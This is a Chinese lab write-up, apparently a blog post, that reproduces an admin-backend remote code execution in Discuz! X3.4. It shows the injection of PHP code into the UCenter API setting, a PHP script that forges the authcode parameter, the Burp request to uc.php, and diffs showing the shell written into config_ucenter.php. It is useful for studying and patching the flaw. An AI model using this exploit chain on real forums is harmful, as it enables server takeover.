Discuz!x3.4 後台修改UCenter配置getshell

https://www.svenbeast.com/post/discuzx34-hou-tai-xiu-gai-uc_center-pei-zhi-getshell/  Discuz!x3.4 后台修改UCenter配置getshell

靶場搭建

寶塔 + php 5.6 + mysql 5.7

https://github.com/sv3nbeast/discuz-x3.4-RCE  Discuz-x3.4-RCE

# git clone https://github.com/sv3nbeast/discuz-x3.4-RCE.git discuz.x3.4.rce.bt

# cd discuz.x3.4.rce.bt

# unzip Discuz_SC_UTF8.zip

寶塔網站目錄設為 upload/ ，訪問站點地址後按照流程安裝（略）

滲透

登錄後台 => 站點 => UCenter 設置

UCenter 通信密钥: 123456

UCenter 访问地址: http://discuz.x3.4.rce.bt/upload/uc_server');phpinfo();//

提交

這步完成後會修改 upload/config/config_ucenter.php ，但是 UC_API 的'會跳脫

diff --git a/upload/config/config_ucenter.php b/upload/config/config_ucenter.php
index 6df46ac..7fb0562 100644
--- a/upload/config/config_ucenter.php
+++ b/upload/config/config_ucenter.php
@@ -12,9 +12,8 @@
 define('UC_DBCONNECT', 0);

 define('UC_CHARSET', 'utf-8');
-define('UC_KEY', 'b2w03075v067ve2d2aEdl9Aco6lbD4Z4T02dA0v2lfj0L6gdodj0l1P6QbX1l8ta');
-define('UC_API', 'http://discuz.x3.4.rce.bt/uc_server');
+define('UC_KEY', '123456');
+define('UC_API', 'http://discuz.x3.4.rce.bt/upload/uc_server\');phpinfo();//');
 define('UC_APPID', '1');
 define('UC_IP', '');
 define('UC_PPP', 20);

生成code參數的值，code.php

$uc_key="123456";//
$time = time() + 720000;
$str = "time=".$time."&action=updateapps";
$code = authcode($str,"ENCODE",$uc_key);
$code = str_replace('+','%2b',$code);
$code = str_replace('/','%2f',$code);
echo $code;

function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
  $ckey_length = 4;
  $key = md5($key != '' ? $key : '123456');
  $keya = md5(substr($key, 0, 16));
  $keyb = md5(substr($key, 16, 16));
  $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';

  $cryptkey = $keya.md5($keya.$keyc);
  $key_length = strlen($cryptkey);

  $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
  $string_length = strlen($string);

  $result = '';
  $box = range(0, 255);

  $rndkey = array();
  for($i = 0; $i <= 255; $i++) {
    $rndkey[$i] = ord($cryptkey[$i % $key_length]);
  }

  for($j = $i = 0; $i < 256; $i++) {
    $j = ($j + $box[$i] + $rndkey[$i]) % 256;
    $tmp = $box[$i];
    $box[$i] = $box[$j];
    $box[$j] = $tmp;
  }

  for($a = $j = $i = 0; $i < $string_length; $i++) {
    $a = ($a + 1) % 256;
    $j = ($j + $box[$a]) % 256;
    $tmp = $box[$a];
    $box[$a] = $box[$j];
    $box[$j] = $tmp;
    $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
  }

  if($operation == 'DECODE') {
    if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
      return substr($result, 26);
    } else {
      return '';
    }
  } else {
    return $keyc.str_replace('=', '', base64_encode($result));
  }
}

# php code.php

1bd61yMP9oRuwAfLBlYNlBPBkzl1jkGTnpSq3vUZyXhcAdE%2b2yy4cB35w4%2fKMYnKEAfQ1mnlRsR2phjoI9k

使用burp suite，攔截帶code參數GET請求發送

請求數據包

GET /api/uc.php?code=1bd61yMP9oRuwAfLBlYNlBPBkzl1jkGTnpSq3vUZyXhcAdE%2b2yy4cB35w4%2fKMYnKEAfQ1mnlRsR2phjoI9k HTTP/1.1

Host: discuz.x3.4.rce.bt

Cookie: ooyE_2132_saltkey=rlpi42qL; ooyE_2132_lastvisit=1633423183; ooyE_2132_sid=iKnzwk; ooyE_2132_lastact=1633426854%09uc.php%09

Sec-Ch-Ua: ";Not A Brand";v="99", "Chromium";v="94"

Sec-Ch-Ua-Mobile: ?0

Sec-Ch-Ua-Platform: "Windows"

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: none

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Accept-Encoding: gzip, deflate

Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7

Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>

<root>

<item id="UC_API">http://discuz.x3.4.rce.bt/uc_server</item>

</root>

UC_API的XML需攔截後手動加入，經過測試這個包要送2次，第二次才生效。

burp suite轉發請求後頁面返回1

會修改 upload/config/config_ucenter.php 和 upload/uc_client/data/cache/apps.php 

diff --git a/upload/config/config_ucenter.php b/upload/config/config_ucenter.php

index 6df46ac..7ceb6e0 100644

--- a/upload/config/config_ucenter.php

+++ b/upload/config/config_ucenter.php

@@ -12,9 +12,8 @@

 define('UC_DBCONNECT', 0);

 define('UC_CHARSET', 'utf-8');

-define('UC_KEY', 'b2w03075v067ve2d2aEdl9Aco6lbD4Z4T02dA0v2lfj0L6gdodj0l1P6QbX1l8ta');

-define('UC_API', 'http://discuz.x3.4.rce.bt/uc_server');

+define('UC_KEY', '123456');

+define('UC_API', 'http://discuz.x3.4.rce.bt/uc_server');phpinfo();//'); // 成功取消跳脫，完成注入

 define('UC_APPID', '1');

 define('UC_IP', '');

 define('UC_PPP', 20);

-?>

diff --git a/upload/uc_client/data/cache/apps.php b/upload/uc_client/data/cache/apps.php

index 7948d40..54e6afa 100644

--- a/upload/uc_client/data/cache/apps.php

+++ b/upload/uc_client/data/cache/apps.php

@@ -1,22 +1,3 @@

 <?php

 $_CACHE['apps'] = array (

-  1 =>

-  array (

-    'appid' => '1',

-    'type' => 'DISCUZX',

-    'name' => 'Discuz! Board',

-    'url' => 'http://discuz.x3.4.rce.bt',

-    'ip' => '',

-    'viewprourl' => '',

-    'apifilename' => 'uc.php',

-    'charset' => '',

-    'dbcharset' => '',

-    'synlogin' => '1',

-    'recvnote' => '1',

-    'extra' => false,

-    'tagtemplates' => '',

-    'allowips' => '',

-  ),

 );

-

-?>

此時 http://discuz.x3.4.rce.bt/config/config_ucenter.php 就是我們的shell地址，至此getshell結束

從第一步得知這個getshell需要登錄後台修改UCenter配置，所以Discuz!x3.4的後台需要做IP訪問限制避免此漏洞利用

如果要重新復現次漏洞，# git reset --hard 後記得 upload/config/config_ucenter.php 和 upload/uc_client/data/cache/apps.php 權限要改成www可寫入，否則後台表單會有bug